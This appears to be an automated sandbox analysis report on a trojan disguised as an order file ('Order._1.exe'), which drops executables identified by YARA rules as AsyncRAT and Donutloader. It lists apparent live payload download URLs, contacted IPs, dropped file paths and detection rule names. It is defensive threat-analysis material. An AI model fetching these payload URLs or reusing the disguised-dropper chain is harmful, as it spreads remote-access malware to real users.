              Source: CoinAIfdp.exe, 00000006.00000002.1489365816.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: CoinAIfdp.exe, 00000006.00000002.1489365816.0000000002FC6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at
              Source: CoinAIfdp.exe, 00000006.00000002.1489365816.0000000002FC6000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000D.00000002.2589796461.00000000025D3000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, CoinAIfdp.exe, 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, svchst.exe, 00000011.00000002.1668370825.0000000003123000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oshi.at/qNzy/OfCN.bin
              Source: Order._1.exe, 00000000.00000003.1493530782.0000000002310000.00000004.00000020.00020000.00000000.sdmp, Order._1.exe, 00000000.00000003.1493612901.0000000002390000.00000004.00000020.00020000.00000000.sdmp, Order._1.exe, 00000000.00000003.1493530782.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 631A.bat.0.drString found in binary or memory: https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe
              Source: Order._1.exe, 00000000.00000003.1493612901.0000000002390000.00000004.00000020.00020000.00000000.sdmp, Order._1.exe, 00000000.00000003.1493530782.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 631A.bat.0.drString found in binary or memory: https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.7:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 34.117.33.233:443 -> 192.168.2.7:49705 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 194.15.112.248:443 -> 192.168.2.7:49706 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPED
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPED

              System Summary

              barindex
              Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: sslproxydump.pcap, type: PCAPMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 15.2.svchst.exe.27b67d5.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.6310000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 6.2.CoinAIfdp.exe.3047761.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 6.2.CoinAIfdp.exe.588128d.2.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.6310000.3.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 6.2.CoinAIfdp.exe.588128d.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 6.2.CoinAIfdp.exe.3047761.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 15.2.svchst.exe.27b67d5.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 16.2.CoinAIfdp.exe.2b867f5.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000F.00000002.1565981743.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2587661382.0000000000767000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000006.00000002.1492148271.0000000006210000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000011.00000002.1666583354.00000000012BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000002.1491679271.0000000005880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000006.00000002.1492546382.0000000006310000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000010.00000002.1587574628.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 0000000D.00000002.2589796461.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2587661382.0000000000711000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000011.00000002.1668370825.0000000003616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 00000006.00000002.1489365816.0000000003040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: 0000000D.00000002.2589796461.0000000002AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 0000000F.00000002.1567072496.0000000002776000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: 00000010.00000002.1591380531.0000000002B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: CoinAIfdp.exe PID: 8008, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: svchst.exe PID: 7348, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: svchst.exe PID: 5392, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: Process Memory Space: CoinAIfdp.exe PID: 7480, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: Process Memory Space: svchst.exe PID: 7800, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\AppData\Roaming\WindowsCache1289fgbfbfgsdvdh=74937962458, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
              Source: C:\Users\user\AppData\Roaming\windowscachergslog.bin, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
              Source: initial sampleStatic PE information: Filename: Order._1.exe
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeJump to dropped file
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040C8980_2_0040C898
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040E9500_2_0040E950
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004109100_2_00410910
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004109D90_2_004109D9
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004105E00_2_004105E0
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004115800_2_00411580
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004109930_2_00410993
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_004106000_2_00410600
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040B3470_2_0040B347
              Source: C:\Users\user\Desktop\Order._1.exeCode function: 0_2_0040F3C80_2_0040F3C8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014FA2046_2_014FA204
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014FD5B06_2_014FD5B0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F47486_2_014F4748
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F8B706_2_014F8B70
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014FC1D86_2_014FC1D8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F47386_2_014F4738
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F46F06_2_014F46F0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F09606_2_014F0960
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F09706_2_014F0970
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F8B616_2_014F8B61
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F0DD76_2_014F0DD7
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_014F0DE86_2_014F0DE8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_054D55886_2_054D5588
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_054D58256_2_054D5825
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_054D22296_2_054D2229
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_054D22386_2_054D2238
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588D0C06_2_0588D0C0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588DF9C6_2_0588DF9C
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588E7A86_2_0588E7A8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588E3786_2_0588E378
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_0588F25C6_2_0588F25C
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_05891A546_2_05891A54
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058BA0006_2_058BA000
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058B94E06_2_058B94E0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058A00066_2_058A0006
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058A00406_2_058A0040
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 6_2_058BBA786_2_058BBA78
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022AA20413_2_022AA204
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A474813_2_022A4748
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022AD5B013_2_022AD5B0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A8B7013_2_022A8B70
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022AC1D813_2_022AC1D8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A46C813_2_022A46C8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A8B6113_2_022A8B61
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A096013_2_022A0960
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A097013_2_022A0970
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A0DE813_2_022A0DE8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_022A0DD713_2_022A0DD7
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049CBC4013_2_049CBC40
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049CAE1013_2_049CAE10
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049C223813_2_049C2238
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049C222913_2_049C2229
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049C2F8013_2_049C2F80
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049C2F2213_2_049C2F22
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_049CA8C013_2_049CA8C0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_04DAA00013_2_04DAA000
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_04DA94E013_2_04DA94E0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_04D9004013_2_04D90040
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_04D9000713_2_04D90007
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_04DABA7813_2_04DABA78
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 13_2_0696004013_2_06960040
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253A20415_2_0253A204
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253474815_2_02534748
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253D5B015_2_0253D5B0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02538B7015_2_02538B70
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253C1D815_2_0253C1D8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253473815_2_02534738
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02538B6115_2_02538B61
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253097015_2_02530970
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0253096015_2_02530960
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02530DD715_2_02530DD7
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02530DE815_2_02530DE8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0270223815_2_02702238
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_0270222915_2_02702229
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02702F7015_2_02702F70
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02702F2215_2_02702F22
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_02702F8015_2_02702F80
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F3A00015_2_04F3A000
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F394E015_2_04F394E0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F2004015_2_04F20040
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F2000615_2_04F20006
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 15_2_04F3BA7815_2_04F3BA78
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101A20416_2_0101A204
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101D5B016_2_0101D5B0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101474816_2_01014748
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_01018B7016_2_01018B70
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101C1D816_2_0101C1D8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101473816_2_01014738
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101096016_2_01010960
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_0101097016_2_01010970
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_01018B6116_2_01018B61
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_01010DD716_2_01010DD7
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_01010DE816_2_01010DE8
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04FE223816_2_04FE2238
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_04FE222916_2_04FE2229
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_053CA00016_2_053CA000
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_053B000616_2_053B0006
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_053B004016_2_053B0040
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_053C94E016_2_053C94E0
              Source: C:\Users\user\AppData\Local\Temp\CoinAIfdp.exeCode function: 16_2_053CBA7816_2_053CBA78
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163A20417_2_0163A204
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163D5B017_2_0163D5B0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163474817_2_01634748
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_01638B7017_2_01638B70
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163C1D817_2_0163C1D8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163473817_2_01634738
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163096017_2_01630960
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0163097017_2_01630970
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_01638B6117_2_01638B61
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_01630DE817_2_01630DE8
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_01630DD717_2_01630DD7
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0301222917_2_03012229
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0301223817_2_03012238
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_03013CE917_2_03013CE9
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0584A00017_2_0584A000
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_058494E017_2_058494E0
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0583000717_2_05830007
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0583004017_2_05830040
              Source: C:\Users\user\AppData\Roaming\svchst.exeCode function: 17_2_0584BA7817_2_0584BA78
              Source: Order._1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: sslproxydump.pcap, type: PCAPMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
